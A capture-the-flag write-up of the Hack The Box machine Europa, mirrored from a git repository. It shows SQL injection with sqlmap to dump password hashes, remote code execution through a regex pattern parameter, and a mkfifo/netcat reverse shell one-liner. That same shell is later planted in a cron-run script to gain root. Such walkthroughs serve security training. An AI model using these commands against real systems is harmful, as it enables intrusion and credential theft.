oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 04:16:59 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/Medium/9.md

325 lines
13 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
search:
exclude: true
---
# Europa Writeup
![](img/9.png)
## Introduction :
Europa is a medium Linux box released back in June 2017.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
λ nihilist [ 10.10.14.20/23 ] [~]
→ nmap -F 10.10.10.22
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 16:20 GMT
Nmap scan report for 10.10.10.22
Host is up (0.100s latency).
Not shown: 97 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 3.03 seconds
λ nihilist [ 10.10.14.20/23 ] [~]
→ nmap -sCV -p22,80,443 10.10.10.22
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 16:20 GMT
Nmap scan report for 10.10.10.22
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_ 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after: 2027-04-17T09:06:22
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.81 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 so let's investigate it by running dirsearch :
λ nihilist [ 10.10.14.20/23 ] [~]
→ dirsearch -u http://10.10.10.22/ -e php,html,txt -t 50
git clone https://github.com/maurosoria/dirsearch.git
dirsearch -u -e -t 50 -x 500
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, html, txt | HTTP method: get | Threads: 50 | Wordlist size: 6733
Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-24_16-22-58.log
Target: http://10.10.10.22/
[16:22:59] Starting:
[16:23:01] 403 - 297B - /.ht_wsr.txt
[16:23:01] 403 - 290B - /.hta
[16:23:01] 403 - 299B - /.htaccess-dev
[16:23:01] 403 - 301B - /.htaccess-local
[16:23:01] 403 - 301B - /.htaccess-marco
[16:23:01] 403 - 299B - /.htaccess.BAK
[16:23:01] 403 - 300B - /.htaccess.bak1
[16:23:01] 403 - 299B - /.htaccess.old
[16:23:01] 403 - 300B - /.htaccess.orig
[16:23:01] 403 - 302B - /.htaccess.sample
[16:23:01] 403 - 300B - /.htaccess.save
[16:23:01] 403 - 299B - /.htaccess.txt
[16:23:01] 403 - 300B - /.htaccess_orig
[16:23:01] 403 - 301B - /.htaccess_extra
[16:23:01] 403 - 298B - /.htaccessBAK
[16:23:01] 403 - 298B - /.htaccess_sc
[16:23:01] 403 - 298B - /.htaccessOLD
[16:23:01] 403 - 299B - /.htaccessOLD2
[16:23:01] 403 - 296B - /.htaccess~
[16:23:01] 403 - 294B - /.htgroup
[16:23:01] 403 - 299B - /.htpasswd-old
[16:23:01] 403 - 300B - /.htpasswd_test
[16:23:01] 403 - 296B - /.htpasswds
[16:23:01] 403 - 294B - /.htusers
[16:23:17] 200 - 12KB - /index.md
[16:23:24] 403 - 300B - /server-status/
[16:23:24] 403 - 299B - /server-status
not much on it, except the default index.html apache 2 default page our nmap scan picked up earlier. Instead we see that our previous nmap scan picked up port 443 with the alternative dns name of DNS:admin-portal.europacorp.htb so let's add it to our /etc/hosts.
λ root [ 10.10.14.20/23 ] [/home/nihilist]
→ echo '10.10.10.22 admin-portal.europacorp.htb' >> /etc/hosts
Now we browse to the following link : https://admin-portal.europacorp.htb, and we are greeted with a login page :
![](prg/9_001.png)
from here, we can start trying some basic sql injections, you can see below our interecepted request using burpsuite : which we will then send to the repeater (ctrl+R) and then go to it (ctrl+shift+r)
POST /login.php HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin-portal.europacorp.htb/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
DNT: 1
Connection: close
Cookie: PHPSESSID=5vfcs42gqn2tbe9am730gusr71
Upgrade-Insecure-Requests: 1
email=admin%40europacorp.htb&password;=password
from here we need to do some trial and error with sql injection cheatsheets, but once we find the correct arguements, we can continue:
![](prg/9_002.png)
from there, we can also use sqlmap
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Europa]
→ sqlmap -u https://admin-portal.europacorp.htb/login.php --data "email=whatever&password;=whatever"
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Europa]
→ sqlmap -u https://admin-portal.europacorp.htb/login.php --data "email=whatever&password;=whatever" dbs
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Europa]
→ sqlmap -u https://admin-portal.europacorp.htb/login.php --data "email=whatever&password;=whatever" tables -D admin
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Europa]
→ sqlmap -u https://admin-portal.europacorp.htb/login.php --data "email=whatever&password;=whatever" tables columns -D admin -T users
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Europa]
→ sqlmap -u https://admin-portal.europacorp.htb/login.php --data "email=whatever&password;=whatever" -D admin -T users dump password
and after running the aforementionned commands which take some time we get the following results :
+----+----------------------+--------+---------------+----------------------------------+
| id | email | active | username | password |
+----+----------------------+--------+---------------+----------------------------------+
| 1 | admin@europacorp.htb | 1 | administrator | 2b6d315337f18617ba18922c0b9597ff |
| 2 | john@europacorp.htb | 1 | john | 2b6d315337f18617ba18922c0b9597ff |
+----+----------------------+--------+---------------+----------------------------------+
Putting the aforementionned hashes into **hash-identifier** we see that we are dealing with md5 hashes :
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Europa]
→ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 2b6d315337f18617ba18922c0b9597ff
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
So cracking it using https://hashkiller.io/ we find the password we need which is : SuperSecretPassword!
![](prg/9_004.png)
once logged in as admin@europacorp.htb:SuperSecretPassword! we go to the Tools tab and we see some sort of an openvpn configuration:
"openvpn": {
"vtun0": {
"local-address": {
"10.10.10.1": "''"
},
"local-port": "1337",
"mode": "site-to-site",
"openvpn-option": [
"--comp-lzo",
"--float",
"--ping 10",
"--ping-restart 20",
"--ping-timer-rem",
"--persist-tun",
"--persist-key",
"--user nobody",
"--group nogroup"
],
"remote-address": "ip_address",
"remote-port": "1337",
"shared-secret-key-file": "/config/auth/secret"
},
"protocols": {
"static": {
"interface-route": {
"ip_address/24": {
"next-hop-interface": {
"vtun0": "''"
}
}
}
}
}
}
So below that config we have a generate button, so we turn the intercept on, activate foxyproxy as we did earlier, and intercept the request.
![](prg/9_005.png)
looking at the pattern parameter, we see that it is a regular expression %2F ( / ) , ip address, and then %2F ( / ) so let's investigate this further by sending the request over to the repeater (ctrl + r) and then going there (ctrl + r) then into the params tab where we can clearly see the pattern we described earlier :
![](prg/9_006.png)
now let's change the pattern to try and execute php code since this is a deprecated regular expression :
![](prg/9_007.png)
And we get remote code execution ! now let's move over to using a reverse shell one liner :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 4444 > /tmp/f
and let's see if we get a reverse shell :
![](prg/9_008.png)
And we get a reverse shell ! now let's print out the user flag :
$ which python
$ cd /home
$ ls
john
$ cd john
$ cat user.txt
2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! we have been able to print out the user flag.
## **Part 3 : Getting Root Access**
Now in order to privesc we need to enumerate the cronjobs running on the machine :
$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<****?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?****>
cron executes a shellscript named "logcleared.sh" every x minutes, so let's add a reverse shell line (one liner once again) but this time on our port 9001.
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 9001 > /tmp/f' > /var/www/cmd/logcleared.sh
$ chmod 777 /var/www/cmd/logcleared.sh
Now we wait a bit with our second netcat listener on port 9001, and we finally get a reverse shell as root :
λ nihilist [ 10.10.14.20/23 ] [~]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.22] 46498
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
7fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! we have been able to print out the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/9_graph.png)
Reference in a new issue View git blame Copy permalink